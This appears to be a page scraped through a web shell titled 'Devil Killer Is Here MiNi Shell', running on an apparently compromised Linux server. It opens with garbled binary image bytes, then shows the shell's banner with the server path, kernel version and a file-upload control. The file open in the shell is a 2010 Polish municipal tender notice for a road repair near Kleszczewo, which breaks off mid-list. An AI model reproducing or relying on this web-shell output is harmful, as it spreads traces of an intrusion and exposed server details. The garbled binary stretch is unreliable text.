JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100517/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100517/133538-N-2010.html

<p class="kh_header"><b>Kleszczewo: REMONT  DROGI GMINNEJ NR 329024P NA ODCINKU KRZYŻOWNIKI   ŚRÓDKA Z PRZEBUDOWĄ INFRASTRUKTURY TOWARZYSZĄCEJ</b><br>
<b>Numer ogłoszenia: 133538 - 2010; data zamieszczenia: 17.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Kleszczewo - Urząd Gminy Kleszczewo , ul. Poznańska 4, 63-005 Kleszczewo, woj. wielkopolskie, tel. 061 8176017, 8176020, 8176033, faks 061 8176184.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kleszczewo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> REMONT  DROGI GMINNEJ NR 329024P NA ODCINKU KRZYŻOWNIKI   ŚRÓDKA Z PRZEBUDOWĄ INFRASTRUKTURY TOWARZYSZĄCEJ.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia jest wykonanie robót budowlanych wchodzących w skład zadania pn.REMONT  DROGI GMINNEJ NR 329024P NA ODCINKU KRZYŻOWNIKI - ŚRÓDKA Z PRZEBUDOWĄ INFRASTRUKTURY TOWARZYSZĄCEJ
III.1

Przedmiotem zamówienia  jest remont odcinka drogi gminnej 329024P, budowa chodnika i ścieżki rowerowej przebudowa zatok autobusowych, wykonanie przejścia dla pieszych z segregacją ruchu za pomocą wysepki, nowe oznakowania poziome i pionowe, przebudowa zjazdów indywidualnych i publicznych, ścinanie i uzupełnienie poboczny mieszanką gliniasto - żwirową. Zakres robót obejmuje wykonanie nowej nawierzchni asfaltowej o ujednoliconej szerokości 5,5 m i grubości 8 do10 cm na odcinku 2270 m wraz z remontem i odtworzeniem dwustronnym poboczy o szerokości 0,75 m oraz rowów odwadniających. Dodatkowo na odcinku 970 m, wzdłuż istniejącej zabudowy  jest wybudowanie ścieżki rowerowej o nawierzchni asfaltowej, o szerokości 1,5m oraz po przeciwnej stronie jezdni chodnika o długości 186,83 m  obsługującego mieszkańców z nowo  wybudowanych osiedli jednorodzinnych.  
Remont jezdni obejmuje wykonanie nowej nawierzchni dwuwarstwowej. Warstwa wiążąca z mieszanki mineralno asfaltowo grysowej częściowo zamkniętej gr. 4 cm, warstwa ścieralnowiążąca z mieszanki mineralno asfaltowo grysowej zamkniętej gr 4-6 cm. Podbudowę stanowi istniejąca nawierzchnia asfaltowa gr.4 cm na konstrukcji brukowej gr 20 cm., którą należy uprzednio wyremontować ( cząstkowy remont )  Nawierzchnię chodnika należy wykonać z kostki brukowej gr. 6 cm na podsypce cementowo  piaskowej, nawierzchnię  ścieżki  rowerowej z masy  asfaltowej gr. 4 cm na podbudowie z kamienia łamanego gr 10 cm,  ograniczoną obrzeżem betonowym gr 8 cm.
Odwodnienie drogi   będzie się sprowadzać do  powierzchniowego jej odprowadzenia  poprzez ścieki z gotowych elementów betonowych do przyległych rowów przydrożnych po ich odtworzeniu i wyprofilowaniu. W ramach inwestycji istniejące utwardzone wjazdy na posesje zostaną przebudowane w stopniu umożliwiającym bezpieczne korzystanie z wyremontowanej drogi. Zjazdy nieutwardzone do posesji i gospodarstw (40 zjazdów indywidualnych, 3 publiczne) wykonane zostaną z nawierzchni asfaltowej grubości 8 cm na podbudowie z tłucznia kamiennego grubości 15 cm. W zadaniu przewidziano wykonanie 4 zatok autobusowych z warstwy ścieralnej: kostka betonowa  gr. 8 cm, podsypki cementowo piaskowej  i podbudowie zasadniczej,  z betonu cementowego B20 gr. 20 cm. W projekcie przyjęto wykonanie 6 przepustów o średnicy 400 mm i długości 7,00 m każdy. Dodatkowo w projekcie przyjęto wycinkę 0,60 ha krzewów zarastających przydrożne rowy.
Szczegółowy zakres robót wraz z opisem przedmiotu zamówienia zawiera dokumentacja projektowa (załącznik nr 8 do SIWZ) wraz z kosztorysami ślepymi które stanowią podstawę do wykonania kosztorysu ofertowego  (załącznik nr 7 do SIWZ) .
Roboty muszą być wykonane zgodnie z projektem budowlanym, specyfikacją techniczną wykonania i odbioru robót oraz zgodnie z wymaganiami obowiązujących przepisów, norm oraz zgodnie z zasadami współczesnej wiedzy technicznej i sztuki budowlanej.

III.2
Wykonawca udzieli Zamawiającemu gwarancji na wykonany przedmiot zamówienia na okres min. 36 miesięcy od dnia odbioru końcowego.
III.3
Za wykonany w całości przedmiot zamówienia obowiązuje rozliczenie kosztorysowe. Wykonawca wraz z ofertą złoży kosztorys ofertowy wykonany na podstawie kosztorysów ślepych (wg załącznika nr 7 do SIWZ). 
III.4
Wykonawca w terminie trzech dni od dnia podpisywania umowy przedstawi Zamawiającemu harmonogram rzeczowo - finansowy realizacji zadania wykonany na podstawie wzoru, który stanowi załącznik nr 9 do SIWZ.
III.5
Wykonawca zobowiązany jest do ujęcia w ofercie kosztów związanych z zabezpieczeniem szwów poprzecznych ( wcinka w istniejące nawierzchnie).
III.6
Roboty objęte niniejszą specyfikacją są to roboty oznaczone kodem, zgodnie z rozporządzeniem nr 213  2008  z dn. 28 listopada 2007 r. w sprawie Wspólnego Słownika Zamówień  CPV, (Dz. Urz. WE L 340 z 16.12.2002 r. z późniejszymi zmianami)
III.7
Wszystkie materiały i wyroby budowlane użyte do wykonania przedmiotu zamówienia muszą spełniać wymogi określone w art. 10 ustawy z dnia 7 lipca 1994 r. Prawo Budowlane (t.j. Dz. U. z 2006r. Nr 156, poz. 1118 z późn. zm.) i posiadać odpowiednie atesty dopuszczające je do stosowania. Dopuszcza się zastosowanie materiałów innych dostawców i producentów aniżeli określone w projekcie budowlanym, specyfikacji technicznej wykonania i odbioru robót i przedmiarach robót, z tym, że podstawowym kryterium doboru jakie muszą one spełniać jest zachowanie parametrów technicznych wyspecyfikowanych w dokumentacji projektowej. 
Zgodnie z art. 29 pkt. 3 ustawy Prawo zamówień publicznych, w każdym przypadku, gdzie wskazano lub użyto w niniejszej SIWZ znaków towarowych, patentów lub pochodzenia materiałów należy rozumieć, że dopuszcza się stosowanie materiałów równoważnych.

Na każde żądanie Zamawiającego Wykonawca obowiązany jest okazać w stosunku do wskazanych materiałów stosowne dokumenty potwierdzające pozwolenie na zastosowanie - wbudowanie (atesty, certyfikaty, deklaracje zgodności, świadectwa jakości). Wykonawca składając ofertę z materiałami równoważnymi do wymienionych w dokumentacji projektowej zobowiązany jest do udokumentowania tej równoważności poprzez dołączenie odpowiednich dokumentów (wystawionych przez producenta zaproponowanego materiału) potwierdzających tę równoważność. Powyższe roboty należy wykonać zgodnie z dokumentacją techniczną  ( projekt budowlany w załączeniu) oraz wszelkimi uzgodnieniami niezbędnymi do wykonania zamówienia. Wykonawca zobowiązuje się zdobyć informacje konieczne do właściwego wykonania zamówienia (w tym zapoznać się z przyszłym zakresem robót i placem budowy).
W.w roboty budowlane należy wykonywać zgodnie z ustawą. z dnia 7 lipca 1994 r.  Prawo Budowlane, projektem budowlanym, sztuką budowlaną, wszelkimi niezbędnymi przepisami, obowiązującymi Polskimi Normami oraz zasadami współczesnej wiedzy technicznej zapewniając bezpieczne i higieniczne warunki pracy, stosując wyroby budowlane posiadające stosowne aprobaty techniczne.
III.8
 Wykonawca jest odpowiedzialny za jakość, zgodność z warunkami technicznymi i jakościowymi opisanymi dla przedmiotu zamówienia w dokumentacji projektowej i specyfikacji technicznej wykonania i odbioru robót,
Wymagana jest należyta staranność przy realizacji zobowiązań umowy,
Ustalenia i decyzje dotyczące wykonywania zamówienia uzgadniane będą przez Zamawiającego z ustanowionym przedstawicielem Wykonawcy,
Określenie przez Wykonawcę telefonów kontaktowych i numerów fax. oraz innych ustaleń niezbędnych dla sprawnego i terminowego wykonania zamówienia,
Wykonawca zapewni, aby wszystkie osoby wyznaczone przez niego do realizacji zamówienia posiadały odpowiednie kwalifikacje oraz przeszkolenia i uprawnienia wymagane przepisami prawa,
Wykonawca zapewni pełną obsługę geodezyjną na czas trwania inwestycji (wytyczenie robót, inwentaryzacja powykonawcza),
Wykonawca zapewni zgodne z przepisami oznakowanie robót,
Wykonawca po zakończeniu robót przedłoży do odbioru końcowego kompletną dokumentację powykonawczą wykonaną w 2 egzemplarzach, zawierającą m.in. geodezyjną inwentaryzację powykonawczą wykonaną przez uprawnionego geodetę,  deklaracje zgodności lub certyfikat zgodności z Polską Normą lub aprobatą techniczną na zastosowane materiały, karty gwarancyjne, instrukcje obsługi, dokumentacje techniczno - rozruchowe, oświadczenie kierownika budowy, itp.
Wymagania dotyczące gwarancji , wykonawca udzieli 36 miesięcy gwarancji na wykonane roboty i materiały od dnia odbioru końcowego.
Po stronie Wykonawcy leżą  wszelkie uzgodnienia między innymi ,  zgłoszenie włączenia oraz prowadzenia robót w pasie drogowym ZDW w Poznaniu dla drogi 434.
Wystąpienie z wnioskiem  o zajęcia pasa drogowego łącznie z uiszczeniem opłat.
III.9
Zamawiający nie  dopuszcza składanie ofert częściowych. 
III.10
Zamawiający nie  przewiduje zawarcie umowy ramowej, ustanowienia dynamicznego systemu zakupów ani zastosowania aukcji elektronicznej.
III.11
Zamawiający nie dopuszcza  składania ofert wariantowych.
III.12
Zamawiający nie przewiduje udzielenia zaliczki na poczet wykonania zamówienia.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>W  przypadku ewentualnych  zamówień  uzupełniających,   stanowiących   nie   więcej   niż  50 procent  zamówienia podstawowego, dokonywanych przez zamawiającego w ciągu sześciu miesięcy . po  terminie odbioru końcowego  przedmiotu  zamówienia Oferent zrealizuje je  w cenach  jednostkowych tożsamych z przedstawioną ofertą  dla  robót  uzupełniających  i dodatkowych po cenach obliczonych na podstawie obowiązujących cen jednostkowych i katalogów KRN przyjętych do wyliczenia  przedstawionej oferty.
Zakres robót tożsamy z zamówieniem podstawowym okreslony w SIWZ  nawierzchni asfaltowej do 12500 m2 oraz nawierzchni z kostki brukowej gr 6 cm 93 mb , nawierzchni z kostki brukowej gr 8 cm 230,00 m2 na podbudowie 20 do 22 cm</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.37.20-6, 45.23.32.22-1, 45.33.31.40-2, 45.23.21.30-2, 45.23.31.42-6, 45.23.31.62-2, 45.23.32.20-7, 45.23.21.30-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Zamawiający wymaga od Wykonawców wniesienia wadium w wysokości 26.000,00 PLN (słownie złotych: dwadzieścia sześć tysięcy  00 100)
2.Wadium wnoszone w pieniądzu wpłaca się przed upływem terminu składania ofert przelewem na rachunek bankowy Urząd Gminy w Kleszczewie 
3.	Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.
4.	 Wadium wniesione w formie niepieniężnej ( art. 45 ust. 6 pkt 2-5 ustawy Pzp) Wykonawca zobowiązany jest złożyć przed upływem terminu składania ofert w kasie    Urzędu Gminy w Kleszczewie ul. Poznańska 4.
5.	Zamawiający zwróci wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza.
6.	Wykonawcy, którego  oferta została wybrana jako najkorzystniejsza, zamawiający zwróci wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy.
7.	Zamawiający zwróci niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
8.	Zamawiający zażąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium zgodnie z punktem 5, jeżeli w wyniku ostatecznego rozstrzygnięcia protestu jego oferta została wybrana jako najkorzystniejsza. Wykonawca w takim wypadku wnosi wadium w terminie określonym przez zamawiającego.
9.	Zgodnie z art. 46 ust. 4a ustawy Pzp Zamawiający zatrzymuje wadium wraz   z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa  w art. 26 ust. 3 w w ustawy, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 w/w ustawy lub pełnomocnictw, chyba, że udowodni, że wynika to z przyczyn nieleżących po jego stronie. 
10.	Ponadto zgodnie z art. 46 ust. 5 w/w ustawy Zamawiający zatrzymuje wadium wraz   z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca jest zobowiązany wykazać odpowiednio, nie później niż na dzień składania ofert, spełnianie warunków, o których mowa w art. 22 ust. 1 pkt. ustawy Pzp. , i brak podstaw do wykluczenia   z powodu niespełniania warunków, o których mowa w art. 24 ust. 1.  Ustawy Pzp.   W tym celu Wykonawca zobowiązany jest złożyć wraz z ofertą 
1.Oświadczenie  o spełnianiu warunków udziału w postępowaniu  kreślonych w art. 22 ust. 1 ustawy Pzp.
2.Oświadczenie o  brak podstaw do wykluczenia   z powodu niespełniania warunków, o których mowa w art. 24 
   ust. 1. ustawy Pzp. 
3. Wypełniony i podpisany formularz ofertowy z akceptacją zawartych w nim warunków i ustaleń.
4. Podpisany wzór umowy z akceptacją warunków w niej zawartych. 
5. Należy wykazać rejestrację do odpowiedniej  ewidencji działalności gospodarczej, potwierdzające dopuszczenie do obrotu prawnego w zakresie objętym przedmiotem zamówienia w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy oraz  nazwisko osoby (osób) uprawnionych do reprezentowania firmy (wystawione nie wcześniej niż 6 miesięcy przed terminem składania ofert).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Należało wykonać  w  okresie  ostatnich  pięciu   lat  przed upływem terminu składania ofert roboty o tym samym charakterze ( o  wartości  min.   80 % ceny ofertowej brutto),  a  jeżeli  okres  prowadzenia  działalności  był  krótszy  -  w  tym okresie,  z podaniem  ich  wartości,  przedmiotu,  dat  wykonania i nazw inwestorów , oraz załączeniem dokumentu potwierdzającego , że  roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone    (odpowiednie    referencje  z  załączonymi  kopiami protokołów odbioru wykazanych robót)Doświadczenie Wykonawcy + dołączone listy min 3 szt
Wykazując spełnienie warunków o których mowa w art. 22 ust  1 ustawy poprzez  poleganie  na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów na zasadach określonych w art., 26 ust.2b ustawy, niezależnie od charakteru prawnego łączących go z nimi stosunków,  w takiej sytuacji Wykonawca zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, po przez  przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia, przedstawi kopie dokumentów  poświadczonych za zgodność z oryginałem przez wykonawcę lub te podmioty ( załącznik do oferty ).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz sprzętu będący w dyspozycji w okresie wykonywania  przedmiotowego zadania.
Należy dysponować odpowiednim parkiem maszynowym, będący w dyspozycji Wykonawcy  w okresie wykonywania  przedmiotowego zadania. Minimum posiadanego sprzętu:

1. Koparka szt. 1 
2. Koparko- ładowarka szt. 1
3. Układarka masy bitumicznej szt. 1
4. Skrapiarka szt. 1
5. Walec stalowo - gum szt. 1
6. Walec stal. wibracyjny szt. 1 
7. Walec gumowy   szt. 1 
8. Szczotka samozbierająca  szt. 1
9. Zagęszczarka płytowa  szt. 1
Wykazując spełnienie warunków o których mowa w art. 22 ust  1 ustawy poprzez  poleganie  na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów na zasadach określonych w art., 26 ust.2b ustawy, niezależnie od charakteru prawnego łączących go z nimi stosunków,  w takiej sytuacji Wykonawca zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, po przez  przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia, przedstawi kopie dokumentów  poświadczonych za zgodność z oryginałem przez wykonawcę lub te podmioty( załącznik do oferty).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Należy wykazać zatrudnienie osób, które będą odpowiedzialne za  kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności.
 Minimum dysponowanie osobą: 
1. uprawnioną do prowadzenia i  kierowania robotami budowlanymi w zakresie budowy dróg 1 osoba 
2. uprawnioną do prowadzenia i kierowania robotami budowlanymi  w zakresie instalacji inżynieryjno sanitarnych, 1 osoba
W stosunku do pozostałych osób zatrudnionych lub będących w dyspozycji wystarczy  oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia (załącznik w ofercie) , jeżeli ustawy nakładają obowiązek posiadania takich uprawnień  
Wykazując spełnienie warunków o których mowa w art. 22 ust  1 ustawy poprzez  poleganie  na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów na zasadach określonych w art., 26 ust.2b ustawy, niezależnie od charakteru prawnego łączących go z nimi stosunków,  w takiej sytuacji Wykonawca zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, po przez  przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia, przedstawi kopie dokumentów  poświadczonych za zgodność z oryginałem przez wykonawcę lub te podmioty( załącznik do oferty).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełnienia  warunków, o których mowa w art. 22 ust. 1 pkt. 4 ustawy Pzp , i brak podstaw do wykluczenia   z powodu niespełniania warunków, o których mowa w art. 24 ust. 1 ustawy. Pzp  W tym celu Wykonawca zobowiązany jest złożyć wraz z ofertą 
1.Oświadczenie  o spełnianiu warunków udziału w postępowaniu  kreślonych w art. 22 ust. 1 pkt. 4 ustawy Pzp.
2.Oświadczenie o  brak podstaw do wykluczenia   z powodu niespełniania warunków, o których mowa w art. 24 
   ust. 1. ustawy Pzp. 
3. Aktualne zaświadczenia z właściwego Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub KRUS potwierdzające, że oferent nie zalega z uiszczaniem podatków, opłat oraz składek na ubezpieczenie społeczne, lub że uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności
4. Informacje z Krajowego Rejestru Karnego, dotyczące prawomocnego skazania za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia publicznego (szczególnie: wyłudzenia zamówienia, utrudnienia lub udaremnienia przetargu, zmowy przetargowej, przekupstwa) lub za jakiekolwiek inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych w zakresie określonym w art. 24 ust.1pkt 4-8 ustawy, wystawione nie wcześniej niż 6 miesięcy przed * terminem składania ofert. Jeśli oferentem jest spółka prawa handlowego ww. informacje powinny dotyczyć członków zarządu firmy
W celu  potwierdzenia,  że  wykonawca  znajduje  się  w  sytuacji  ekonomicznej  i  finansowej  zapewniającej wykonanie zamówienia,   wykonawca  załączy  informację z   banku   lub  spółdzielczej  kasy  oszczędnościowo-kredytowej,  w   którym wykonawca posiada rachunek,  potwierdzającej  wysokość  posiadanych  środków    finansowych  lub  zdolność  kredytową wykonawcy,  wystawiona  nie  wcześniej niż   3 miesiące przed upływem terminu składania ofert na kwotę minimum 1 000 000,00.
Opłaconą polisę, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej na wartość złożonej oferty w zakresie prowadzonej działalności związanej z przedmiotem zamówienia obejmującej roboty te,  które  Wykonawca deklaruje się wykonać na kwotę minimum 
1 000 000,00 zł.
Wykazując spełnienie warunków o których mowa w art. 22 ust  1 ustawy poprzez  poleganie  na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów na zasadach określonych w art., 26 ust.2b ustawy, niezależnie od charakteru prawnego łączących go z nimi stosunków,  w takiej sytuacji Wykonawca zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, po przez  przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia, przedstawi kopie dokumentów  poświadczonych za zgodność z oryginałem przez wykonawcę lub te podmioty( załącznik do oferty).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

